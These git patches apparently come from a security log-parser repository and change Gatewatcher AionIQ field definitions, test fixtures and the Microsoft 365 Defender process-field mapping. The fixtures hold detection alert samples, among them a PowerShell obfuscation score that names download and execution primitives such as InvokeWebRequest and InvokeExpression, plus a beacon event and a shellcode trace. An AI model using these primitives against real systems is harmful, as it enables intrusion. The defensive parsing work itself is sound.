     "message": "{  \n  \"observer\": {    \n    \"vendor\": \"gatewatcher\",    \n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",    \n    \"gcap\": {      \n      \"ingress\": {        \n        \"interface\": {          \n         \"name\": \"monvirt\"        \n         }      \n       },      \n    \"hostname\": \"gcap-clement-l.gatewatcher.fr\",      \n    \"version\": \"2.5.4.0-rc1\"    \n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:6f:37:76:51:45\",\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"http.dottedquadhost.pdf\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n    \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 0,\n    \"flow_id\": 1331841998337663\n  },\n  \"destination\": {\n    \"mac\": \"00:43:70:57:75:55\",\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"flow\": {\n    \"bytes_toclient\": 1362,\n    \"bytes_toserver\": 358,\n    \"pkts_toclient\": 3,\n    \"start\": \"2024-09-11T13:55:01.079487+0000\",\n    \"pkts_toserver\": 4\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 1135\n    }\n  },\n  \"sigflow\": {\n    \"action\": \"allowed\",\n    \"metadata\": {\n      \"signature_severity\": [\n        \"Informational\"\n      ],\n      \"attack_target\": [\n        \"Client_Endpoint\"\n      ],\n      \"created_at\": [\n        \"2019_04_23\"\n      ],\n      \"deployment\": [\n        \"Perimeter\"\n      ],\n      \"performance_impact\": [\n        \"Significant\"\n      ],\n      \"updated_at\": [\n        \"2022_11_21\"\n      ]\n    },\n    \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n    \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n    \"stream\": 1,\n    \"signature_id\": 2027265,\n    \"rev\": 4,\n    \"category\": \"Potentially Bad Traffic\",\n    \"gid\": 1,\n    \"packet_info\": {\n      \"linktype\": 1\n    },\n    \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n  },\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"sigflow_alert\",\n    \"severity\": 2,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n    \"created\": \"2024-09-11T13:55:01.080901+0000\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_stats.json b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
index f6c5e07ee..f94495cd2 100644
--- a/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\"\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"metric\",\n    \"dataset\": \"system_metrics\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"sigflow_stats\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"stats\": {\n    \"app_layer\": {},\n    \"tcp\": {},\n    \"uptime\": 443637,\n    \"ftp\": {},\n    \"flow_bypassed\": {},\n    \"decoder\": {},\n    \"detect\": {},\n    \"defrag\": {},\n    \"flow\": {},\n    \"capture\": {},\n    \"http\": {},\n    \"file_store\": {}\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\"\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"metric\",\n    \"dataset\": \"system_metrics\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"sigflow_stats\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"stats\": {\n    \"app_layer\": {},\n    \"tcp\": {},\n    \"uptime\": 443637,\n    \"ftp\": {},\n    \"flow_bypassed\": {},\n    \"decoder\": {},\n    \"detect\": {},\n    \"defrag\": {},\n    \"flow\": {},\n    \"capture\": {},\n    \"http\": {},\n    \"file_store\": {}\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\"\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"metric\",\n    \"dataset\": \"system_metrics\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"sigflow_stats\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"stats\": {\n    \"app_layer\": {},\n    \"tcp\": {},\n    \"uptime\": 443637,\n    \"ftp\": {},\n    \"flow_bypassed\": {},\n    \"decoder\": {},\n    \"detect\": {},\n    \"defrag\": {},\n    \"flow\": {},\n    \"capture\": {},\n    \"http\": {},\n    \"file_store\": {}\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}",

From e63a079f938c7a7746e101d707896603b6252e43 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 1 Oct 2024 19:20:41 +0200
Subject: [PATCH 099/317] fix(GateWatcher): change the identifier of the AIONIQ
 V103 format

---
 GateWatcher/aioniq_ecs/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq_ecs/_meta/manifest.yml b/GateWatcher/aioniq_ecs/_meta/manifest.yml
index d6480f719..a1e0c5867 100644
--- a/GateWatcher/aioniq_ecs/_meta/manifest.yml
+++ b/GateWatcher/aioniq_ecs/_meta/manifest.yml
@@ -1,4 +1,4 @@
-uuid: e9fbba55-89c2-4b6c-ad15-9a46412dd680
+uuid: 2f28e4f9-a4f3-40a6-9909-b69f3df32535
 name: Gatewatcher AionIQ V103
 slug: aioniq-v103
 

From 59f174e5a2cf781aebc37c8c9d90ae217ca3fbe2 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 1 Oct 2024 19:22:42 +0200
Subject: [PATCH 100/317] fix(GateWatcher): declare subfields

---
 GateWatcher/aioniq_ecs/_meta/fields.yml       | 57 ++++++++++---------
 .../aioniq_ecs/tests/beacon_event.json        |  6 +-
 .../tests/codebreaker_powershell_alert.json   |  2 +-
 .../tests/codebreaker_shellcode_alert.json    |  7 ++-
 .../aioniq_ecs/tests/malcore_event.json       |  2 +-
 GateWatcher/aioniq_ecs/tests/metadata.json    |  7 ++-
 .../aioniq_ecs/tests/sigflow_alert.json       |  4 +-
 7 files changed, 52 insertions(+), 33 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index a036865f3..e53df154f 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -373,10 +373,15 @@ gatewatcher.http.hostname:
   name: gatewatcher.http.hostname
   type: text
 
-gatewatcher.http.http2:
-  description: http http2 field
-  name: gatewatcher.http.http2
-  type: text
+gatewatcher.http.http2.request.priority:
+  description: http http2 request priority field
+  name: gatewatcher.http.http2.request.priority
+  type: number
+
+gatewatcher.http.http2.stream_id:
+  description: http http2 stream_id field
+  name: gatewatcher.http.http2.stream_id
+  type: number
 
 gatewatcher.http.http_refer:
   description: http_refer field
@@ -616,7 +621,7 @@ gatewatcher.malcore.analyzers_up:
 gatewatcher.malcore.code:
   description: malcore code field
   name: gatewatcher.malcore.code
-  type: number
+  type: keyword
 
 gatewatcher.malcore.detail_scan_time:
   description: malcore detail_scan_time field
@@ -698,9 +703,9 @@ gatewatcher.malicious_powershell.score:
   name: gatewatcher.malicious_powershell.score
   type: number
 
-gatewatcher.malicious_powershell.score_details:
+gatewatcher.malicious_powershell.score_details_text:
   description: malicious_powershell score_details field
-  name: gatewatcher.malicious_powershell.score_details
+  name: gatewatcher.malicious_powershell.score_details_text
   type: text
 
 gatewatcher.matched_event.file.gaps:
@@ -1018,15 +1023,15 @@ gatewatcher.rfb.server_security_failure_reason:
   name: gatewatcher.rfb.server_security_failure_reason
   type: text
 
-gatewatcher.shellcode.analysis:
+gatewatcher.shellcode.analysis_text:
   description: shellcode analysis field
-  name: gatewatcher.shellcode.analysis
+  name: gatewatcher.shellcode.analysis_text
   type: text
 
 gatewatcher.shellcode.encodings:
   description: shellcode encodings field
   name: gatewatcher.shellcode.encodings
-  type: text
+  type: array
 
 gatewatcher.shellcode.id:
   description: shellcode id field
@@ -1068,10 +1073,10 @@ gatewatcher.sigflow.packet:
   name: gatewatcher.sigflow.packet
   type: text
 
-gatewatcher.sigflow.packet_info:
-  description: sigflow packet_info field
-  name: gatewatcher.sigflow.packet_info
-  type: text
+gatewatcher.sigflow.packet_info.linktype:
+  description: sigflow packet_info linktype field
+  name: gatewatcher.sigflow.packet_info.linktype
+  type: number
 
 gatewatcher.sigflow.payload:
   description: sigflow payload field
@@ -1223,16 +1228,6 @@ gatewatcher.ssh.server.software_version:
   name: gatewatcher.ssh.server.software_version
   type: text
 
-gatewatcher.syslog.message:
-  description: syslog message field
-  name: gatewatcher.syslog.message
-  type: text
-
-gatewatcher.syslog.priority:
-  description: syslog priority field
-  name: gatewatcher.syslog.priority
-  type: text
-
 gatewatcher.syslog.facility.code:
   description: syslog facility code field
   name: gatewatcher.syslog.facility.code
@@ -1243,6 +1238,16 @@ gatewatcher.syslog.facility.name:
   name: gatewatcher.syslog.facility.name
   type: text
 
+gatewatcher.syslog.message:
+  description: syslog message field
+  name: gatewatcher.syslog.message
+  type: text
+
+gatewatcher.syslog.priority:
+  description: syslog priority field
+  name: gatewatcher.syslog.priority
+  type: text
+
 gatewatcher.syslog.severity.name:
   description: syslog severity name field
   name: gatewatcher.syslog.severity.name
@@ -1263,9 +1268,9 @@ gatewatcher.tftp.packet:
   name: gatewatcher.tftp.packet
   type: text
 
-gatewatcher.tls:
+gatewatcher.tls.client.server_name:
   description: TLS meta data field
-  name: gatewatcher.tls
+  name: gatewatcher.tls.client.server_name
   type: text
 
 gatewatcher.user_agent.major:
diff --git a/GateWatcher/aioniq_ecs/tests/beacon_event.json b/GateWatcher/aioniq_ecs/tests/beacon_event.json
index 228c38f0c..707d65357 100644
--- a/GateWatcher/aioniq_ecs/tests/beacon_event.json
+++ b/GateWatcher/aioniq_ecs/tests/beacon_event.json
@@ -50,7 +50,11 @@
         "log_format_version": "1.0.0",
         "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
       },
-      "tls": "{\"client\": {\"server_name\": \"cisco-update.com\"}}",
+      "tls": {
+        "client": {
+          "server_name": "cisco-update.com"
+        }
+      },
       "version": "1"
     },
     "network": {
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
index 5d691dec4..55f01813f 100644
--- a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
@@ -36,7 +36,7 @@
         "proba_obfuscated": 1,
         "sample_id": "09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr",
         "score": 1890,
-        "score_details": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}"
+        "score_details_text": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}"
       },
       "network": {
         "flow_id": 779924698221176,
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
index 1ee17a006..5e1061891 100644
--- a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
@@ -49,14 +49,17 @@
         "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
       },
       "shellcode": {
-        "analysis": [
+        "analysis_text": [
           "{\"_id\": -1, \"info\": \"Stop : End of shellcode (Exit)\"}",
           "{\"_id\": 0, \"args\": \"{lpFileName: user32.dll}\", \"call\": \"kernel32_LoadLibraryA\", \"ret\": \"0x70600000\"}",
           "{\"_id\": 1, \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\", \"call\": \"user32_MessageBoxA\", \"ret\": \"1\"}",
           "{\"_id\": 2, \"args\": \"{uExitCode: 0}\", \"call\": \"kernel32_ExitProcess\", \"ret\": \"0\"}"
         ],
         "encodings": [
-          "{\"count\": 4, \"name\": \"Bloxor\"}"
+          {
+            "count": 4,
+            "name": "Bloxor"
+          }
         ],
         "id": "790a2aa742e1da23e14c9b7270ee81a1",
         "sample_id": "09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr",
diff --git a/GateWatcher/aioniq_ecs/tests/malcore_event.json b/GateWatcher/aioniq_ecs/tests/malcore_event.json
index d9aec47da..27393e551 100644
--- a/GateWatcher/aioniq_ecs/tests/malcore_event.json
+++ b/GateWatcher/aioniq_ecs/tests/malcore_event.json
@@ -60,7 +60,7 @@
         "analyzed_other": 4,
         "analyzed_suspicious": 0,
         "analyzers_up": 16,
-        "code": 1,
+        "code": "1",
         "detail_scan_time": 373,
         "detail_threat_found": "Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash",
         "detail_wait_time": 660,
diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json
index 124260a3d..8814beb9d 100644
--- a/GateWatcher/aioniq_ecs/tests/metadata.json
+++ b/GateWatcher/aioniq_ecs/tests/metadata.json
@@ -31,7 +31,12 @@
         "id": "78681613-57af-4e10-b732-58f5d2e0ae12"
       },
       "http": {
-        "http2": "{\"request\": {\"priority\": 15}, \"response\": {}, \"stream_id\": 13}"
+        "http2": {
+          "request": {
+            "priority": 15
+          },
+          "stream_id": 13
+        }
       },
       "metadata": {
         "flowbits": [
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
index 1bcd1b452..de7d99791 100644
--- a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
@@ -71,7 +71,9 @@
         "gid": 1,
         "metadata": "{\"attack_target\": [\"Client_Endpoint\"], \"created_at\": [\"2019_04_23\"], \"deployment\": [\"Perimeter\"], \"performance_impact\": [\"Significant\"], \"signature_severity\": [\"Informational\"], \"updated_at\": [\"2022_11_21\"]}",
         "packet": "AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA",
-        "packet_info": "{\"linktype\": 1}",
+        "packet_info": {
+          "linktype": 1
+        },
         "payload": "R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
         "payload_printable": "GET /malcore_10KB_clean.pdf HTTP/1.1\r\nHost: 56.53.117.115\r\nAccept-Encoding: gzip,compress,deflate\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\n\r\n",
         "rev": 4,

From d823688c0479b398b2775bd008908cf5950f7785 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 2 Oct 2024 12:15:15 +0200
Subject: [PATCH 101/317] Improve process fields in some cases

---
 Microsoft/microsoft-365-defender/CHANGELOG.md |  6 ++
 .../microsoft-365-defender/_meta/fields.yml   | 22 +++++
 .../microsoft-365-defender/ingest/parser.yml  | 57 ++++++++---
 .../tests/test_device_event.json              | 37 +++----
 .../tests/test_device_process_created.json    |  8 +-
 .../tests/test_device_process_events.json     | 35 ++++---
 .../tests/test_local_ip.json                  | 39 +++-----
 .../tests/test_process_error.json             | 99 +++++++++++++++++++
 8 files changed, 214 insertions(+), 89 deletions(-)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_process_error.json

diff --git a/Microsoft/microsoft-365-defender/CHANGELOG.md b/Microsoft/microsoft-365-defender/CHANGELOG.md
index 73fac4a78..2f0ea38af 100644
--- a/Microsoft/microsoft-365-defender/CHANGELOG.md
+++ b/Microsoft/microsoft-365-defender/CHANGELOG.md
@@ -7,6 +7,12 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## 2023-12-07 - 1.0.2
+
+### Fixed
+
+- Fix process fields in some categories
+
 ## 2023-12-07 - 1.0.1
 
 ### Changed
diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index 3a95175de..d2c57d50a 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -837,3 +837,25 @@ process.user.name:
   description: User name of the account that ran the process responsible for the event
   name: process.user.name
   type: keyword
+
+process.parent.user.domain:
+  description: Domain of the account that ran the parent process responsible for the event
+  name: process.parent.user.domain
+  type: keyword
+
+process.parent.user.email:
+  description: User principal name (UPN) of the account that ran the parent process responsible
+    for the event
+  name: process.parent.user.email
+  type: keyword
+
+process.parent.user.id:
+  description: Security Identifier (SID) of the account that ran the parent process responsible
+    for the event
+  name: process.parent.user.id
+  type: keyword
+
+process.parent.user.name:
+  description: User name of the account that ran the parent process responsible for the event
+  name: process.parent.user.name
+  type: keyword
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 0704ce4ca..d0ff72f0a 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -124,22 +124,6 @@ stages:
           host.os.full: "{{json_event.message.properties.OSPlatform}}"
           host.os.version: "{{json_event.message.properties.OSVersion}}"
           host.type: "{{json_event.message.properties.DeviceType}}"
-          process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
-          process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
-          process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
-          process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
-          process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
-          process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
-          process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
-          process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
-          process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
-          process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
-          process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
-          process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
-          process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
-          process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
-          process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
-          process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
           registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
           registry.key: "{{json_event.message.properties.RegistryKey}}"
           registry.value: "{{json_event.message.properties.RegistryValueName}}"
@@ -257,6 +241,47 @@ stages:
       - set:
           network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}"
         filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}'
+
+      - set:
+          process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+          process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
+          process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+          process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
+          process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+          process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
+          process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+          process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+          process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+          process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+          process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+          process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+          process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+          process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
+          process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
+          process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
+        filter: '{{ json_event.message.get("category") != "AdvancedHunting-DeviceEvents" and json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'
+
+      - set:
+          process.name: "{{json_event.message.properties.FileName}}"
+          process.executable: "{{json_event.message.properties.FolderPath}}"
+          process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
+          process.start: "{{json_event.message.properties.ProcessCreationTime}}"
+          process.pid: "{{json_event.message.properties.ProcessId}}"
+          process.hash.md5: "{{json_event.message.properties.MD5}}"
+          process.hash.sha1: "{{json_event.message.properties.SHA1}}"
+          process.hash.sha256: "{{json_event.message.properties.SHA256}}"
+          process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}"
+          process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+          process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}"
+          process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+          process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+          process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}"
+          process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+          process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+          process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+          process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+          process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+        filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceEvents" or json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}'
   set_alert_evidence_fields:
     actions:
       - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index ca708b0ed..a1f8cc8d4 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -53,35 +53,22 @@
         "--sandboxed-process-id=2",
         "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\""
       ],
-      "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-      "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
-      "hash": {
-        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
-        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
-        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
-      },
-      "name": "software_reporter_tool.exe",
       "parent": {
+        "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
         "name": "software_reporter_tool.exe",
-        "pid": 15532,
-        "start": "2022-09-01T06:56:23.595229Z"
-      },
-      "pid": 1664,
-      "start": "2022-09-01T06:56:23.788784Z",
-      "user": {
-        "domain": "intranet",
-        "email": "user@example.org",
-        "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
-        "name": "group1"
-      },
-      "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
+        "pid": 1664,
+        "start": "2022-09-01T06:56:23.788784Z",
+        "user": {
+          "domain": "intranet",
+          "email": "user@example.org",
+          "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
+          "name": "group1"
+        },
+        "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
+      }
     },
     "related": {
-      "hash": [
-        "44543e0c6f30415c670c1322e61ca68602d58708",
-        "51a9cac9c4e8da44ffd7502be17604ee",
